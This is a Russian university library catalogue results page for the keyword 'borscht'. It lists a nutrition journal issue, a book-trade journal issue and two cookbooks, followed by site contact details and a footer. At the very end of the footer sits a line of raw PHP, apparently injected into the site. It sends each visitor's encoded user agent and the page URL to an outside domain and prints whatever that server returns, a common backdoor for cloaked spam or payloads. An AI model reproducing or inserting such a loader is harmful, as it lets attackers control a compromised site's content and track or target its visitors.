Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

287 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=БОРЩ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 4
1. 
Питание и общество. - Журнал, 2013г. № 1
Оглавление 
  • Любина, Е. Все о супе / Е. Любина. - с.22-23
    Кл. слова: БОРЩ
  • Арефьева, А. Огуречная трава / А. Арефьева. - с.25
    Кл. слова: ТРАВА ОГУРЕЧНАЯ, БУРАЧНИК ЛЕКАРСТВЕННЫЙ, БОРАГО
2. 
Университетская книга. - Журнал, 2003г. № 8
Оглавление 
  • Об утверждении Положения о Федеральном экспертном совете Министерства образования Российской Федерации, Положения о порядке присвоения (подтверждения) учебным изданиям грифа Министерства образования Российской Федерации в области общего образования, Положения о порядке.... - с.2
  • Положение о Федеральном экспертном совете Министерства образования Российской Федерации. - с.2-4
  • Положение о порядке присвоения (подтверждения) учебным изданиям грифа Министерства образования Российской Федерации в области общего образования. - с.4-6
  • Положение о порядке проведения апробации (расширенной экспертизы) учебников для последующего присвоения грифа "Рекомендовано Министерством образования Российской Федерации". - с.6-7
  • Книга в строку. - с.8-19
  • Александрова, Н. О. Бакалавр и специалист книжного дела: общее и особенное / Н. О. Александрова. - с.22-24
  • Кузнецов, Б. А. Влияние рынка на культуру издания учебной книги / Б. А. Кузнецов. - с.26-28
  • Эккли, П. Борщ для Пенни Эккли / П. Эккли, Т. Н. Рожковская. - с.28-30
  • Игнатов, В. Г. 100 экзаменационных ответов / В. Г. Игнатов, В. И. Бутов. - с.31
  • Дашков, Л. П. "Экономический бум в России неизбежен" / Л. П. Дашков. - с.32-33
  • Экологическая геохимия и геохимические барьеры. - с.34-35
  • Манушин, Э. А. История - кладезь мудрости / Э. А. Манушин. - с.36-37
  • Глухов, А. Г. Пастырь на ниве культуры / А. Г. Глухов. - с.38-43
  • Анонсы сентября. - с.44-49
  • Дворянский, М. В. Эффективная книжная торговля основана на современных информационных технологиях / М. В. Дворянский, А. З. Григорян, О. С. Доброхвалов. - с.50-51
  • Издательский торговый дом "КноРус". - с.52-56
  • Мир деловой книги: Издательско-книготорговое объединение "Юрайт". - с.58-63
  • Издательско-книготорговая фирма "Омега-Л". - с.64-71
  • Центр учебной и профессиональной литературы предлагает. - с.72-79
3. 
Авроров, Валерий Александрович. Традиционные народные технологии приготовления пищи из натуральных продуктов [Текст] / В. А. Авроров, Н. В. Моряхина, Н. Д. Тутов, 2017. - 287 с.
Держатели документа (Информация об экземплярах) 

Приведены рецепты различных скоромных и постных блюд, холодных и горячих закусок, салатов, саусов, маринадов, напитков, выпечки, сладких блюд, пасхи, мороженого и др., приготовляемых в домашних условиях.

Даны рекомендации по достижению вкусовых качеств блюд.

Предлагаемые рецепты блюд были хорошо известны в свое время, а некоторые из них и сегодня используются на предприятиях общественного питания.

Для всех приведенных рецептов характерно использование только натурального и высококачественного растительного и животного пищевого сырья и полуфабрикатов.

Учебное пособие предназначено для студентов вузов, обучающихся по направлениям "Технология продукции и организация общественного питания", "Продукты питания из растительного сырья".

4. 
Сидорина Е. И. Современная кухня [Текст] : кулинар. рецепты из доступ. продуктов / Е. И. Сидорина, 1993. - 543 с.
Ключевые слова 
СЕРВИРОВКА СТОЛА -- ЗАКУСКА ХОЛОДНАЯ -- САЛАТ -- ВИНЕГРЕТ -- ПАШТЕТ -- ЗАЛИВНОЕ -- БУТЕРБРОД -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ РЫБЫ -- СЫР -- БЛЮДА ИЗ ЯИЦ -- СУП -- БОРЩ -- ЩИ -- РАССОЛЬНИК -- СУП ОВОЩНОЙ -- УХА -- СУП МОЛОЧНЫЙ -- СУП ГРИБНОЙ -- БЛИНЫ -- ОЛАДЬИ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ БОБОВЫХ -- ЗАПЕКАНКА -- ПЛОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КАРТОФЕЛЯ -- СОУС -- ТЕСТО ДРОЖЖЕВОЕ -- ТЕСТО СЛОЕНОЕ -- ТОРТЫ -- ТЕСТО БИСКВИТНОЕ -- ПЕЧЕНЬЕ -- ХВОРОСТ -- ВАФЛИ -- КЕКС -- ПИРОГ -- КРЕМ МАСЛЯНЫЙ -- КРЕМ БЕЛКОВЫЙ -- КРЕМ ЗАВАРНОЙ -- МУСС -- ЖЕЛЕ -- КОМПОТ -- КИСЕЛЬ -- БЛЮДА СЛАДКИЕ -- ЗАГОТОВКИ -- КАПУСТА КВАШЕНАЯ -- КОНСЕРВИРОВАНИЕ -- МАРИНОВАНИЕ -- ВАРЕНЬЕ -- ДЖЕМ -- ЦУКАТЫ


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3218 - 01.04.2020
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 4.34 с.16 запросов, 4.63c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;